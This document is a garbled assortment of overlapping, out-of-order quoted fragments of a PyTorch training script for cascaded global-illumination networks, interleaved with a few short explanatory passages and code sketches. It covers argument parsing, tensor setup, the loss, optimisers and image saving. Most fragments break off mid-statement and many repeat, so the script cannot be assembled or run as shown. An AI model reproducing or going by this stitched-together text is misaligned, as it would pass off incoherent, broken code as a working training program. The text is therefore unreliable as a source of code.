"Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or",
"utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch,",
"training weight parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3',",
"globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimizer opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) )
"imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch)",
"): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j +=",
"imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3",
"#################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch =",
"opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1,",
"depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu",
"+ 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10)",
"/ width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds',",
"g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed:",
"+ 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2",
"globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :],
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) #####################################",
"n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2",
"dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch),",
"* segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum =",
"DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle = False) j = 0",
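The loader setup wraps a custom BatchLoader in torch's DataLoader with 8 worker processes and no shuffling. A self-contained sketch with a hypothetical TensorDataset standing in for dataLoader.BatchLoader:

    import torch
    from torch.utils.data import DataLoader, TensorDataset

    dataset = TensorDataset(torch.rand(64, 3, 256, 256))  # placeholder data
    loader = DataLoader(dataset, batch_size=16, num_workers=8, shuffle=False)
    for i, (batch,) in enumerate(loader):
        pass  # one training iteration per batch, as in the fragments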
"/ 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch)",
"/ pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr =",
"3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) )",
"10) * segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data,",
"1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) )",
"albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)",
"# Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2',",
") globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) /",
"= dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad()",
"is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment",
"segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j)",
"setting parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16,",
"to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The",
"globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimizer opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4,
"# Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId)",
"= torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3)",
"utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate(",
"1 or j == 1000 or j% 2000 == 0: # Save the",
"segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId)",
"parser.add_argument('--nepoch', type=int, default=18, help='the number of epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input",
"setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how many levels of cascades should we use') opt
") # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune:",
"m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m] - imP2Batch) * (globalIllu2s[m]",
"opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA",
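The fragments around this point seed Python's and PyTorch's RNGs from one random integer. A minimal runnable sketch of that pattern; the argparse namespace is replaced by a plain argument, and the CUDA branch is an addition for completeness:

    import random
    import torch

    def seed_everything(seed):
        # Seed Python's RNG and PyTorch's CPU generator so runs repeat.
        random.seed(seed)
        torch.manual_seed(seed)
        # CUDA kernels draw from a separate generator; seed it when present.
        if torch.cuda.is_available():
            torch.cuda.manual_seed_all(seed)

    seed_everything(random.randint(1, 10000))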
":], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if",
"help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models') #",
"opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and",
"globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimizer opGlobalIllu1to2 =
"= globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimizer opGlobalIllu1to2 = optim.Adam(globIllu1to2.parameters(), lr=2e-4, betas=(0.5, 0.999)
"fine-tune the network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch",
"torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The location of the training set parser.add_argument('--dataRoot',
"= 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu2 =",
"print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")",
"+ 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] +",
"# Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu )",
"parser = argparse.ArgumentParser() # The location of the training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"depthBatch, segBatch], dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch,",
"1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) )",
"optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize)",
"[1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog =",
"pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) * (globalIllu3s[m] - imP3Batch) *",
"j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut =",
"* (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum(",
"levels of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0
"= random.randint(1, 10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not",
"= models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) )",
") imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu",
"* segBatch.expand_as(depthBatch) depthOut = (depthOut - 0.25) /0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment,",
"type=int, default=0, help='how many levels of cascades should we use') opt = parser.parse_args()
"import models import torchvision.utils as vutils import utils import dataLoader from torch.utils.data import",
"globalIllu3Errs = [] pixelNum = torch.sum(segBatch ).cpu().data.item() for m in range(0, n +",
") imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu )",
"opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W,",
":], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :],",
"enumerate(brdfLoader): j += 1 # Load data from cpu to gpu albedo_cpu =",
"globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch,",
"= np.float32) for epoch in list(range(opt.epochId+1, opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')",
"opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize,",
"############## ###################### # Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch",
"epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)],",
"trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) if j ==",
"parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and",
"sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum",
"The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how many levels of cascades should
"rate if (epoch + 1) % 2 == 0: for param_group in opGlobalIllu1to2.param_groups:",
"totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() #",
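Both cascade losses are combined into one weighted scalar, backpropagated once, and each network's optimizer then steps. A compact sketch under assumed shapes; g2W/g3W play the roles of the --globalIllu2/--globalIllu3 weights and the Linear modules are stand-ins:

    import torch
    import torch.nn as nn
    import torch.optim as optim

    net2, net3 = nn.Linear(4, 4), nn.Linear(4, 4)
    op2 = optim.Adam(net2.parameters(), lr=2e-4, betas=(0.5, 0.999))
    op3 = optim.Adam(net3.parameters(), lr=2e-4, betas=(0.5, 0.999))

    x, gt = torch.randn(8, 4), torch.randn(8, 4)
    op2.zero_grad(); op3.zero_grad()
    err2 = ((net2(x) - gt) ** 2).mean()
    err3 = ((net3(x) - gt) ** 2).mean()
    g2W, g3W = 1.0, 1.0
    totalErr = g2W * err2 + g3W * err3  # weighted sum of both stages
    totalErr.backward()                 # one backward pass serves both losses
    op2.step(); op3.step()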
"== 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups:",
"print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You",
"# The location of the training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None,
"Send things into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch",
"should probably run with --cuda\") #################################### # initialize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3,
"sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step()",
"parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width",
"betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader =",
"size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to",
"opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment",
"os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2,",
"The location of the training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the
"np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype =",
"epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog,",
"parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the network') # The",
"default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples and models')",
"parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training the network') # The training
"= opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \",",
"= np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1,",
"gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu )",
"opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) segBatch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"--cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) normalBatch",
"globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch, segBatch], dim=1) globalIllu3 =",
"opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1,",
"imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8, shuffle",
"vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close()",
"= np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j",
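Errors are accumulated as rows of a NumPy array seeded with a dummy np.ones row; the reported value is the mean over all rows so far, or over the last 1000 once j passes 1000. A sketch of that bookkeeping with fabricated error rows:

    import numpy as np

    cascadeLevel = 0
    errsNpList = np.ones([1, 1 + cascadeLevel], dtype=np.float32)  # dummy row 0

    for j in range(1, 5):  # stand-in iteration counter
        errRow = np.random.rand(1, 1 + cascadeLevel).astype(np.float32)
        errsNpList = np.concatenate([errsNpList, errRow], axis=0)
        if j < 1000:
            running = np.mean(errsNpList[1:j + 1, :], axis=0)        # skip dummy row
        else:
            running = np.mean(errsNpList[j - 999:j + 1, :], axis=0)  # last 1000 iters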
"of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action =",
"\", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a",
"= 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W",
"epoch, j) if j == 1 or j == 1000 or j% 2000",
"weight of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action",
"utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu',
"1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList=",
"j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch,",
"default=0, help='how many levels of cascades should we use') opt = parser.parse_args() print(opt)
"Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId)",
"parser.add_argument('--experiment', default=None, help='the path to store samples and models') # The basic training",
":], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :],",
"the ground truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j)",
") imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the",
":], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1,",
"trainingLog.close() # Update the learning rate if (epoch + 1) % 2 ==
"roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu = dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape)",
"normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape)",
"import dataLoader from torch.utils.data import DataLoader parser = argparse.ArgumentParser() # The location of
") vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image(",
"training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store",
"normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch",
"network or not') parser.add_argument('--epochId', type=int, default = -1, help='the training epoch of the",
"set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to store samples",
"input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the",
"we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is",
"Save the predicted results for n in range(0, opt.cascadeLevel + 1): vutils.save_image( (",
"= np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for epoch in",
"trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList,",
"trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1,",
"You have a CUDA device, so you should probably run with --cuda\") ####################################",
"if opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### #",
"imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu",
"- imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0",
"axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0),",
"globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate(",
"axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu',",
"1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data",
"utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j)",
") segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize,",
"opt.nepoch) ): trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j",
"for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch),",
"albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape)",
"if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py %s'",
"cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape)",
"dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones(",
"= roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch =",
"2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch), globalIllu2ErrsNpList ) np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment,",
"[globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0) if j < 1000:",
"globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into GPU if opt.cuda:",
